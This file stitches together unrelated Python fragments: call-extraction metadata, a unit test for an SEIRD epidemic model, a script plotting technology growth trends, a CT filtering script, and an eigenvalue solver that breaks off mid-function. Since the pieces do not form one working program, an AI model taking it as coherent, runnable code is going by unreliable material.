'numpy.array', 'np.array', (['hyp_palpha_past'], {}), '(hyp_palpha_past)\n', (16008, 16025), True, 'import numpy as np\n'), ((16051, 16075), 'numpy.array', 'np.array', (['hyp_emb_memory'], {}), '(hyp_emb_memory)\n', (16059, 16075), True, 'import numpy as np\n'), ((16101, 16140), 'numpy.transpose', 'np.transpose', (['nextemb_memory', '(1, 0, 2)'], {}), '(nextemb_memory, (1, 0, 2))\n', (16113, 16140), True, 'import numpy as np\n'), ((16167, 16192), 'numpy.array', 'np.array', (['hyp_ePmb_memory'], {}), '(hyp_ePmb_memory)\n', (16175, 16192), True, 'import numpy as np\n'), ((16219, 16259), 'numpy.transpose', 'np.transpose', (['nextePmb_memory', '(1, 0, 2)'], {}), '(nextePmb_memory, (1, 0, 2))\n', (16231, 16259), True, 'import numpy as np\n'), ((16837, 16875), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['m.weight.data'], {}), '(m.weight.data)\n', (16860, 16875), False, 'from torch import nn\n'), ((17011, 17049), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['m.weight.data'], {}), '(m.weight.data)\n', (17034, 17049), False, 'from torch import nn\n'), ((5058, 5080), 'random.shuffle', 'random.shuffle', (['bucket'], {}), '(bucket)\n', (5072, 5080), False, 'import random\n'), ((6887, 6961), 'numpy.zeros', 'np.zeros', (["(n_samples, params['input_channels'], max_height_x, max_width_x)"], {}), "((n_samples, params['input_channels'], max_height_x, max_width_x))\n", (6895, 6961), True, 'import numpy as np\n'), ((6990, 7022), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (6998, 7022), True, 'import numpy as np\n'), ((7080, 7112), 'numpy.zeros', 'np.zeros', (['(maxlen_ry, n_samples)'], {}), '((maxlen_ry, n_samples))\n', (7088, 7112), True, 'import numpy as np\n'), ((7139, 7171), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7147, 7171), True, 'import numpy as np\n'), ((7198, 7241), 'numpy.zeros', 'np.zeros', (['(n_samples, maxlen_ly, maxlen_ly)'], {}), '((n_samples, maxlen_ly, maxlen_ly))\n', (7206, 7241), True, 'import numpy as np\n'), ((7268, 7300), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7276, 7300), True, 'import numpy as np\n'), ((7327, 7359), 'numpy.zeros', 'np.zeros', (['(maxlen_ry, n_samples)'], {}), '((maxlen_ry, n_samples))\n', (7335, 7359), True, 'import numpy as np\n'), ((7391, 7439), 'numpy.zeros', 'np.zeros', (['(n_samples, max_height_x, max_width_x)'], {}), '((n_samples, max_height_x, max_width_x))\n', (7399, 7439), True, 'import numpy as np\n'), ((7473, 7505), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7481, 7505), True, 'import numpy as np\n'), ((7539, 7571), 'numpy.zeros', 'np.zeros', (['(maxlen_ry, n_samples)'], {}), '((maxlen_ry, n_samples))\n', (7547, 7571), True, 'import numpy as np\n'), ((7605, 7637), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7613, 7637), True, 'import numpy as np\n'), ((7671, 7714), 'numpy.zeros', 'np.zeros', (['(n_samples, maxlen_ly, maxlen_ly)'], {}), '((n_samples, maxlen_ly, maxlen_ly))\n', (7679, 7714), True, 'import numpy as np\n'), ((9156, 9172), 'numpy.zeros', 'np.zeros', (['live_k'], {}), '(live_k)\n', (9164, 9172), True, 'import numpy as np\n'), ((9517, 9561), 'torch.zeros', 'torch.zeros', (['(1)', 'ctx0.shape[2]', 'ctx0.shape[3]'], {}), '(1, ctx0.shape[2], ctx0.shape[3])\n', (9528, 9561), False, 'import torch\n'), ((9608, 9652), 'torch.zeros', 'torch.zeros', (['(1)', 'ctx0.shape[2]', 'ctx0.shape[3]'], {}), '(1, ctx0.shape[2], ctx0.shape[3])\n', (9619, 9652), False, 'import torch\n'), ((9681, 9731), 'torch.zeros', 'torch.zeros', (["params['maxlen']", 'live_k', "params['m']"], {}), "(params['maxlen'], live_k, params['m'])\n", (9692, 9731), False, 'import torch\n'), ((9761, 9811), 'torch.zeros', 'torch.zeros', (["params['maxlen']", 'live_k', "params['m']"], {}), "(params['maxlen'], live_k, params['m'])\n", (9772, 9811), False, 'import torch\n'), ((13513, 13534), 'copy.copy', 'copy.copy', (['costs[idx]'], {}), '(costs[idx])\n', (13522, 13534), False, 'import copy\n'), ((16901, 16936), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias.data', '(0.0)'], {}), '(m.bias.data, 0.0)\n', (16918, 16936), False, 'from torch import nn\n'), ((17075, 17110), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias.data', '(0.0)'], {}), '(m.bias.data, 0.0)\n', (17092, 17110), False, 'from torch import nn\n'), ((9454, 9486), 'torch.ones', 'torch.ones', (['(1)'], {'dtype': 'torch.int64'}), '(1, dtype=torch.int64)\n', (9464, 9486), False, 'import torch\n'), ((11373, 11434), 'torch.zeros', 'torch.zeros', (['(next_ctP.shape[0] * rpos_beam)', 'next_ctP.shape[1]'], {}), '(next_ctP.shape[0] * rpos_beam, next_ctP.shape[1])\n', (11384, 11434), False, 'import torch\n'), ((11460, 11521), 'torch.zeros', 'torch.zeros', (['(next_h01.shape[0] * rpos_beam)', 'next_h01.shape[1]'], {}), '(next_h01.shape[0] * rpos_beam, next_h01.shape[1])\n', (11471, 11521), False, 'import torch\n'), ((11555, 11664), 'torch.zeros', 'torch.zeros', (['(next_calpha_past.shape[0] * rpos_beam)', 'next_calpha_past.shape[1]', 'next_calpha_past.shape[2]'], {}), '(next_calpha_past.shape[0] * rpos_beam, next_calpha_past.shape[1\n ], next_calpha_past.shape[2])\n', (11566, 11664), False, 'import torch\n'), ((11989, 12016), 'torch.from_numpy', 'torch.from_numpy', (['next_remb'], {}), '(next_remb)\n', (12005, 12016), False, 'import torch\n'), ((12467, 12511), 'numpy.tile', 'np.tile', (['hyp_scores[:, None]', '[1, rpos_beam]'], {}), '(hyp_scores[:, None], [1, rpos_beam])\n', (12474, 12511), True, 'import numpy as np\n'), ((12566, 12589), 'numpy.log', 'np.log', (['(next_lp + 1e-10)'], {}), '(next_lp + 1e-10)\n', (12572, 12589), True, 'import numpy as np\n'), ((12589, 12616), 'numpy.log', 'np.log', (['(rpos_scores + 1e-10)'], {}), '(rpos_scores + 1e-10)\n', (12595, 12616), True, 'import numpy as np\n'), ((13023, 13043), 'numpy.zeros', 'np.zeros', (['(k - dead_k)'], {}), '(k - dead_k)\n', (13031, 13043), True, 'import numpy as np\n'), ((13743, 13768), 'copy.copy', 'copy.copy', (['next_state[ti]'], {}), '(next_state[ti])\n', (13752, 13768), False, 'import copy\n'), ((13802, 13825), 'copy.copy', 'copy.copy', (['next_h1t[ti]'], {}), '(next_h1t[ti])\n', (13811, 13825), False, 'import copy\n'), ((13866, 13897), 'copy.copy', 'copy.copy', (['next_calpha_past[ti]'], {}), '(next_calpha_past[ti])\n', (13875, 13897), False, 'import copy\n'), ((13938, 13970), 'copy.copy', 'copy.copy', (['next_palpha_past[tPi]'], {}), '(next_palpha_past[tPi])\n', (13947, 13970), False, 'import copy\n'), ((14010, 14040), 'copy.copy', 'copy.copy', (['nextemb_memory[tPi]'], {}), '(nextemb_memory[tPi])\n', (14019, 14040), False, 'import copy\n'), ((14081, 14112), 'copy.copy', 'copy.copy', (['nextePmb_memory[tPi]'], {}), '(nextePmb_memory[tPi])\n', (14090, 14112), False, 'import copy\n'), ((16278, 16303), 'torch.from_numpy', 'torch.from_numpy', (['next_lw'], {}), '(next_lw)\n', (16294, 16303), False, 'import torch\n'), ((16332, 16360), 'torch.from_numpy', 'torch.from_numpy', (['next_state'], {}), '(next_state)\n', (16348, 16360), False, 'import torch\n'), ((16387, 16413), 'torch.from_numpy', 'torch.from_numpy', (['next_h1t'], {}), '(next_h1t)\n', (16403, 16413), False, 'import torch\n'), ((16448, 16482), 'torch.from_numpy', 'torch.from_numpy', (['next_calpha_past'], {}), '(next_calpha_past)\n', (16464, 16482), False, 'import torch\n'), ((16517, 16551), 'torch.from_numpy', 'torch.from_numpy', (['next_palpha_past'], {}), '(next_palpha_past)\n', (16533, 16551), False, 'import torch\n'), ((16584, 16616), 'torch.from_numpy', 'torch.from_numpy', (['nextemb_memory'], {}), '(nextemb_memory)\n', (16600, 16616), False, 'import torch\n'), ((16650, 16683), 'torch.from_numpy', 'torch.from_numpy', (['nextePmb_memory'], {}), '(nextePmb_memory)\n', (16666, 16683), False, 'import torch\n'), ((1566, 1576), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1574, 1576), False, 'import sys\n'), ((9940, 9977), 'torch.ones', 'torch.ones', (['live_k'], {'dtype': 'torch.int64'}), '(live_k, dtype=torch.int64)\n', (9950, 9977), False, 'import torch\n'), ((10872, 10890), 'numpy.arange', 'np.arange', (['n_batch'], {}), '(n_batch)\n', (10881, 10890), True, 'import numpy as np\n')] |
import numpy as np
import pandas as pd
import unittest
from Eir.DTMC.spatialModel.Hub.HubSEIRD import HubSEIRD
import Eir.exceptions as e
# keep this seed when running test so that outputs can be checked
np.random.seed(7363817)
class Test_HubSEIRD(unittest.TestCase):
def __init__(self):
self.test = HubSEIRD(S0=999, E0=1, I0=1, R0=0, pss=.23, rho=.2, gamma=.15, mu=.2, side=25, rstart=3, days=31, w0=.73, alpha=2)
self.sdetails = self.test.run()
def generateCSV(self):
""" How CSV was generated in order to ensure reproducibility."""
df = self.test.toDataFrame()
df.to_csv("HubSEIRD.csv", index=False)
def checkOutputs(self):
df = self.test.toDataFrame()
df2 = pd.read_csv("HubSEIRD.csv")
assert df.equals(df2)
print("Outputs test passed")
def checkSimulInputs(self):
# checks for invalid person inputs
self.assertRaises(e.NotIntException, self.sdetails.personHistory, 100.0)
self.assertRaises(e.PersonNotFound, self.sdetails.personHistory, 1001)
# checks for exceptions when inputting days
self.assertRaises(e.DayOutOfRange, self.sdetails.transmissionHistoryOnDay, 65)
self.assertRaises(e.DayOutOfRange, self.sdetails.transmissionHistoryOnDay, -1)
self.assertRaises(e.NotIntException, self.sdetails.transmissionHistoryOnDay, 25.0)
print("Simul_Details input test passed: throws error for invalid inputs")
def checkInput(self):
# checks for int exception
self.assertRaises(e.NotIntException, HubSEIRD, 999.0, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotIntException, HubSEIRD, 999, 1.0, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotIntException, HubSEIRD, 999, 1, 1.0, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotIntException, HubSEIRD, 999, 1, 1, 0.0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotIntException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31.0, 1.0, 6**0.5, 2)
# checks for not float exception
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, '.23', .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, True, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, 'apples', .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, False, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, '0', 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, True, 2)
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, '2')
self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, '.2', 25, 3, 31, 1.0, 6**0.5, 2)
# checks for negative values
self.assertRaises(e.NegativeValException, HubSEIRD, -999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, -1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, -1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, -.23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, -.2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, -.15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, -25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, -.15, .2, 25, 3, 31, 1.0, -6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, -1.0, 6**0.5, 2)
self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, -.2, 25, 3, 31, 1.0, 6**0.5, 2)
# checks probability
self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, .2, 1.15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, 1.2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, 1.23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.1, 6**0.5, 2)
self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, 1.2, 25, 3, 31, 1.0, 6**0.5, 2)
print("Input Test Passed")
if __name__ == '__main__':
a = Test_HubSEIRD()
#a.generateCSV()
a.checkOutputs()
a.checkSimulInputs()
a.checkInput()
| [
"pandas.read_csv",
"numpy.random.seed",
"Eir.DTMC.spatialModel.Hub.HubSEIRD.HubSEIRD"
] | [((205, 228), 'numpy.random.seed', 'np.random.seed', (['(7363817)'], {}), '(7363817)\n', (219, 228), True, 'import numpy as np\n'), ((319, 442), 'Eir.DTMC.spatialModel.Hub.HubSEIRD.HubSEIRD', 'HubSEIRD', ([], {'S0': '(999)', 'E0': '(1)', 'I0': '(1)', 'R0': '(0)', 'pss': '(0.23)', 'rho': '(0.2)', 'gamma': '(0.15)', 'mu': '(0.2)', 'side': '(25)', 'rstart': '(3)', 'days': '(31)', 'w0': '(0.73)', 'alpha': '(2)'}), '(S0=999, E0=1, I0=1, R0=0, pss=0.23, rho=0.2, gamma=0.15, mu=0.2,\n side=25, rstart=3, days=31, w0=0.73, alpha=2)\n', (327, 442), False, 'from Eir.DTMC.spatialModel.Hub.HubSEIRD import HubSEIRD\n'), ((747, 774), 'pandas.read_csv', 'pd.read_csv', (['"""HubSEIRD.csv"""'], {}), "('HubSEIRD.csv')\n", (758, 774), True, 'import pandas as pd\n')] |
#!/usr/bin/env python
"""Graphs the progress of various technologies."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
__author__ = "<NAME>"
import os
import numpy as np
import pylab as plt
import matplotlib.ticker as ticker
from astropy.table import Table
from astropy import log
###########
# Constants
###########
DATADIR = "data"
RED = "#e74c3c"
BLUE = "#2c3e50"
#########
# Classes
#########
class DataSet(object):
labelcolumn = None
xlim, ylim = None, None
def __init__(self, filename=None):
# Read the data
if filename == None:
filename = os.path.join(DATADIR, self.prefix, self.prefix+'.csv')
self.table = Table.read(filename, format='ascii')
self.xdata = self.table[self.xcolumn]
self.ydata = self.table[self.ycolumn]
def trendfit(self):
# Fit the exponential trend
return np.polyfit(self.xdata, np.log10(self.ydata), 1)
def plot(self, trendfit=True, title=True):
self.fig = plt.figure(figsize=(8, 5))
self.ax = plt.subplot(111)
self.ax.set_yscale("log")
self.ax.scatter(self.xdata,
self.ydata,
facecolor=RED,
s=70,
linewidth=1,
edgecolor='black')
# Show labels next to the data points
if self.labelcolumn:
labels = self.table[self.labelcolumn]
for i in range(len(labels)):
plt.text(self.xdata[i] + 0.6, self.ydata[i], labels[i],
ha="left",
va="center",
fontsize=16,
backgroundcolor="#f6f6f6")
if trendfit:
self.ax.plot(self.xdata, 10**np.polyval(self.trendfit(), self.xdata),
color=BLUE, lw=2, alpha=0.5, zorder=-10)
if title:
"""
self.ax.text(0.05, 0.95,
'{0}\n{1}'.format(self.title,
self.get_doubling_text()),
va='top',
transform=self.ax.transAxes,
fontsize=18)
"""
if 'ranial' in self.ylabel:
self.ax.text(0.05, 0.95,
"+{:.5f}% per year".format(self.get_annual_increase()),
va='top',
ha='left',
transform=self.ax.transAxes,
fontsize=18)
else:
self.ax.text(0.05, 0.95,
"+{:.0f}% per year".format(self.get_annual_increase()),
va='top',
ha='left',
transform=self.ax.transAxes,
fontsize=18)
self.ax.set_xlabel(self.xlabel, fontsize=18)
self.ax.set_ylabel(self.ylabel, fontsize=18)
if self.xlim:
self.ax.set_xlim(self.xlim)
if self.ylim:
self.ax.set_ylim(self.ylim)
self.ax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%.0f'))
# Aesthetics
self.ax.spines["right"].set_visible(False)
self.ax.spines["top"].set_visible(False)
self.ax.get_xaxis().tick_bottom()
self.ax.get_yaxis().tick_left()
self.fig.tight_layout()
return self.fig
def get_doubling_time(self):
"""Returns number of months it takes for the y-axis data to double."""
doubling_time = 12 * np.log10(2) / self.trendfit()[0]
return doubling_time
def get_doubling_text(self):
return "double every {:.0f} months".format(self.get_doubling_time())
def get_annual_increase(self):
"""Returns the percentage increase per year."""
annual_fractional_increase = 100 * (10**self.trendfit()[0]) - 100
log.info("{0} increases by {1:.2f} percent each year".format(self.prefix, annual_fractional_increase))
return annual_fractional_increase
def get_prediction(self):
"""Returns the increase after 22 years."""
myfit = self.trendfit()
predict = 10**np.polyval(self.trendfit(), [2000, 2022])
increase = predict[1] / predict[0]
return "{0}: increased {1:.0f}x between 2000 and 2022".format(self.prefix, increase)
class TransistorCountData(DataSet):
title = "CPU transistor counts"
prefix = "transistor-counts"
xcolumn = "year"
xlabel = "Year"
ycolumn = "transistors"
ylabel = "Transistors"
xlim = [1965, 2020]
def plot(self, **kwargs):
super(TransistorCountData, self).plot(**kwargs)
# Annotate the era of multi-core processors
self.ax.plot([2006, 2018], [5e6, 5e6], lw=2.5, color='black')
self.ax.text(2012, 1.7e6, "Multi-core era", fontsize=15, ha="center")
return self.fig
class DiskDrivePriceData(DataSet):
title = "Storage per dollar ratios"
prefix = "disk-drive-price"
xcolumn = "year"
xlabel = "Year"
ycolumn = "size_mb"
ylabel = "MB per dollar"
xlim = [1999, 2019]
def __init__(self):
super(DiskDrivePriceData, self).__init__()
self.ydata = self.table['size_mb'] / self.table['cost_usd']
class SupercomputerSpeedData(DataSet):
title = "Supercomputer speeds"
prefix = "fastest-supercomputer"
xcolumn = "year"
xlabel = "Year"
ycolumn = "flops"
ylabel = "FLOPS"
xlim = [1991, 2018]
class ResearchInternetSpeedData(DataSet):
title = "Internet speeds"
prefix = "research-internet-speed"
xcolumn = "year"
xlabel = "Year"
ycolumn = "bps"
ylabel = "Bits/s"
class StorageBusSpeedData(DataSet):
title = "Storage bus speeds"
prefix = "storage-bus-speed"
xcolumn = "year"
xlabel = "Year"
ycolumn = "bps"
ylabel = "Bits/s"
labelcolumn = "name"
xlim = [1980, 2020]
class TelescopePixelCountsData(DataSet):
title = "Pixel rates of large optical surveys"
prefix = "telescope-pixel-counts"
xcolumn = "year"
xlabel = "Start of science"
ycolumn = "pixels"
ylabel = "Pixels/s"
labelcolumn = "name"
xlim = [1998, 2026]
def __init__(self):
super(TelescopePixelCountsData, self).__init__()
self.ydata = self.table['pixels'] / self.table['cycle_time']
class TelescopePixelCountsInfraredData(DataSet):
title = "Pixel rates of near-infrared surveys"
prefix = "telescope-pixel-counts-near-infrared"
xcolumn = "year"
xlabel = "Start of science"
ycolumn = "pixels"
ylabel = "Pixels/s"
labelcolumn = "name"
#xlim = [1998, 2025]
def __init__(self):
super(TelescopePixelCountsInfraredData, self).__init__()
self.ydata = self.table['pixels'] / self.table['cycle_time']
class SpacePhotometryData(DataSet):
title = "Pixel rates of NASA's photometry missions"
prefix = "space-photometry-missions"
xcolumn = "year"
xlabel = "Launch"
ycolumn = "pixels_per_second"
ylabel = "Pixels/s"
labelcolumn = "name"
xlim = [2006, 2029]
class IAUMembers(DataSet):
title = "Number of IAU members"
prefix = "iau-members"
xcolumn = "year"
xlabel = "Year"
ycolumn = "iau_members"
ylabel = "Number of IAU Members"
class CranialCapacityData(DataSet):
title = "The cranial capacity of humans"
prefix = "cranial-capacity"
xcolumn = "year"
xlabel = "Million years BC"
ycolumn = "brain_cc"
ylabel = "Cranial capacity [cm³]"
xlim = [-3.5, 0.1]
def __init__(self):
super(CranialCapacityData, self).__init__()
self.xdata = self.table['year'] / 1e6
def get_doubling_time(self):
"""Returns number of months it takes for the y-axis data to double."""
doubling_time = np.log10(2) / self.trendfit()[0]
return doubling_time
def get_doubling_text(self):
return "doubles every {:.1f} million years".format(self.get_doubling_time())
def get_annual_increase(self):
"""Returns the percentage increase per year."""
annual_fractional_increase = 100 * (10**self.trendfit()[0]) - 100
annual_fractional_increase = annual_fractional_increase / 1e6
log.info("{0} increases by {1:.2f} percent each year".format(self.prefix, annual_fractional_increase))
return annual_fractional_increase
if __name__ == '__main__':
"""Create graphs for all datasets in the repository."""
DESTINATION_DIR = 'graphs'
datasets = [DiskDrivePriceData(),
SupercomputerSpeedData(),
ResearchInternetSpeedData(),
StorageBusSpeedData(),
TelescopePixelCountsData(),
TelescopePixelCountsInfraredData(),
SpacePhotometryData(),
IAUMembers(),
TransistorCountData(),
CranialCapacityData()]
for ds in datasets:
for extension in ['png', 'pdf']:
output_filename = os.path.join(DESTINATION_DIR,
ds.prefix+'.'+extension)
log.info("Writing {}".format(output_filename))
ds.plot(title=True).savefig(output_filename, dpi=200)
print("{} {}".format(ds.title, ds.get_doubling_text()))
#print(ds.get_prediction()) | [
"pylab.subplot",
"pylab.figure",
"matplotlib.ticker.FormatStrFormatter",
"pylab.text",
"numpy.log10",
"os.path.join",
"astropy.table.Table.read"
] | [((734, 770), 'astropy.table.Table.read', 'Table.read', (['filename'], {'format': '"""ascii"""'}), "(filename, format='ascii')\n", (744, 770), False, 'from astropy.table import Table\n'), ((1062, 1088), 'pylab.figure', 'plt.figure', ([], {'figsize': '(8, 5)'}), '(figsize=(8, 5))\n', (1072, 1088), True, 'import pylab as plt\n'), ((1107, 1123), 'pylab.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (1118, 1123), True, 'import pylab as plt\n'), ((658, 714), 'os.path.join', 'os.path.join', (['DATADIR', 'self.prefix', "(self.prefix + '.csv')"], {}), "(DATADIR, self.prefix, self.prefix + '.csv')\n", (670, 714), False, 'import os\n'), ((970, 990), 'numpy.log10', 'np.log10', (['self.ydata'], {}), '(self.ydata)\n', (978, 990), True, 'import numpy as np\n'), ((3316, 3349), 'matplotlib.ticker.FormatStrFormatter', 'ticker.FormatStrFormatter', (['"""%.0f"""'], {}), "('%.0f')\n", (3341, 3349), True, 'import matplotlib.ticker as ticker\n'), ((8029, 8040), 'numpy.log10', 'np.log10', (['(2)'], {}), '(2)\n', (8037, 8040), True, 'import numpy as np\n'), ((9228, 9286), 'os.path.join', 'os.path.join', (['DESTINATION_DIR', "(ds.prefix + '.' + extension)"], {}), "(DESTINATION_DIR, ds.prefix + '.' + extension)\n", (9240, 9286), False, 'import os\n'), ((1563, 1687), 'pylab.text', 'plt.text', (['(self.xdata[i] + 0.6)', 'self.ydata[i]', 'labels[i]'], {'ha': '"""left"""', 'va': '"""center"""', 'fontsize': '(16)', 'backgroundcolor': '"""#f6f6f6"""'}), "(self.xdata[i] + 0.6, self.ydata[i], labels[i], ha='left', va=\n 'center', fontsize=16, backgroundcolor='#f6f6f6')\n", (1571, 1687), True, 'import pylab as plt\n'), ((3761, 3772), 'numpy.log10', 'np.log10', (['(2)'], {}), '(2)\n', (3769, 3772), True, 'import numpy as np\n')] |
import numpy as np
import math
import scipy.io as scio
from CreateHSP import CreateHSP
dataFile = './data/FDK_proj_curve.mat'
data = scio.loadmat(dataFile)
ScanR = data['ScanR']
DistD = data['StdDis']
Radius = data['ObjR']
ProjData = data['Proj']
ProjScale = int(data['ProjScale'])
DecFanAng = data['DecAngle']
Dgy = np.array(ProjData, dtype=np.float32)
YL = int(data['YL'])
ZL = int(data['ZL'])
# Try to import the offset, otherwise set them as zeros
if data.get('YOffSet'):
YOffSet = data['YOffSet']
else:
YOffSet = 0
if data.get('ZOffSet'):
ZOffSet = data['ZOffSet']
else:
ZOffSet = 0
DecHeigh = data['DecHeigh']
DeltaUW = DecFanAng/(YL-1)
DeltaU2 = 2*DeltaUW
# pre-weighting
for Yindex in range(1, YL-1):
Dgy[Yindex,:,:]=(ProjData[Yindex+1,:,:]-ProjData[Yindex-1,:,:])/DeltaU2
Dgy[0,:,:] = Dgy[1,:,:]
Dgy[YL-1,:,:]= Dgy[YL-2,:,:]
Dg=Dgy
# filtering
WindowType=1
nn=int(math.pow(2,(math.ceil(math.log2(abs(YL)))+1)))
HS=CreateHSP(nn,WindowType)
nn2= nn*2
k = int(nn/2)
TempF=np.zeros(nn2)
TempF[0:k]=HS[k:nn]
TempF[k+nn:nn2]=HS[0:k]
HS=TempF*complex(0,1)
FFT_F=np.fft.fft(HS)
GF=Dg
for ProjIndex in range(0,ProjScale):
for j in range(ZL):
TempData=np.ones(YL)
for k in range(YL):
TempData[k]=Dg[k,j,ProjIndex]
FFT_S=np.fft.fft(TempData,nn2)
TempData=np.fft.ifft(FFT_S*FFT_F).imag
for k in range(YL):
GF[k,j,ProjIndex]=-TempData[k]
dataNew = './data/FDK_Filtering_curve.mat'
scio.savemat(dataNew,
{'GF': Dgy,
'ScanR': ScanR,
'DistD': DistD,
'DecFanAng': DecFanAng,
'ProjScale': ProjScale,
'YL': YL,
'YOffSet': YOffSet,
'DecHeigh': DecHeigh,
'ZL': ZL,
'ZOffSet':ZOffSet,
'Radius': Radius,},
)
| [
"numpy.fft.ifft",
"scipy.io.loadmat",
"numpy.fft.fft",
"numpy.zeros",
"CreateHSP.CreateHSP",
"scipy.io.savemat",
"numpy.ones",
"numpy.array"
] | [((135, 157), 'scipy.io.loadmat', 'scio.loadmat', (['dataFile'], {}), '(dataFile)\n', (147, 157), True, 'import scipy.io as scio\n'), ((320, 356), 'numpy.array', 'np.array', (['ProjData'], {'dtype': 'np.float32'}), '(ProjData, dtype=np.float32)\n', (328, 356), True, 'import numpy as np\n'), ((954, 979), 'CreateHSP.CreateHSP', 'CreateHSP', (['nn', 'WindowType'], {}), '(nn, WindowType)\n', (963, 979), False, 'from CreateHSP import CreateHSP\n'), ((1009, 1022), 'numpy.zeros', 'np.zeros', (['nn2'], {}), '(nn2)\n', (1017, 1022), True, 'import numpy as np\n'), ((1095, 1109), 'numpy.fft.fft', 'np.fft.fft', (['HS'], {}), '(HS)\n', (1105, 1109), True, 'import numpy as np\n'), ((1468, 1694), 'scipy.io.savemat', 'scio.savemat', (['dataNew', "{'GF': Dgy, 'ScanR': ScanR, 'DistD': DistD, 'DecFanAng': DecFanAng,\n 'ProjScale': ProjScale, 'YL': YL, 'YOffSet': YOffSet, 'DecHeigh':\n DecHeigh, 'ZL': ZL, 'ZOffSet': ZOffSet, 'Radius': Radius}"], {}), "(dataNew, {'GF': Dgy, 'ScanR': ScanR, 'DistD': DistD,\n 'DecFanAng': DecFanAng, 'ProjScale': ProjScale, 'YL': YL, 'YOffSet':\n YOffSet, 'DecHeigh': DecHeigh, 'ZL': ZL, 'ZOffSet': ZOffSet, 'Radius':\n Radius})\n", (1480, 1694), True, 'import scipy.io as scio\n'), ((1195, 1206), 'numpy.ones', 'np.ones', (['YL'], {}), '(YL)\n', (1202, 1206), True, 'import numpy as np\n'), ((1286, 1311), 'numpy.fft.fft', 'np.fft.fft', (['TempData', 'nn2'], {}), '(TempData, nn2)\n', (1296, 1311), True, 'import numpy as np\n'), ((1327, 1353), 'numpy.fft.ifft', 'np.fft.ifft', (['(FFT_S * FFT_F)'], {}), '(FFT_S * FFT_F)\n', (1338, 1353), True, 'import numpy as np\n')] |
"""
Eigenvalue analyses tools for mechnical system:
mass matrix M, stiffness matrix K and possibly damping matrix C
"""
import pandas as pd
import numpy as np
from scipy import linalg
def polyeig(*A):
"""
Solve the polynomial eigenvalue problem:
(A0 + e A1 +...+ e**p Ap)x = 0
Return the eigenvectors [x_i] and eigenvalues [e_i] that are solutions.
Usage:
X,e = polyeig(A0,A1,..,Ap)
Most common usage, to solve a second order system: (K + C e + M e**2) x =0
X,e = polyeig(K,C,M)
"""
if len(A)<=0:
raise Exception('Provide at least one matrix')
for Ai in A:
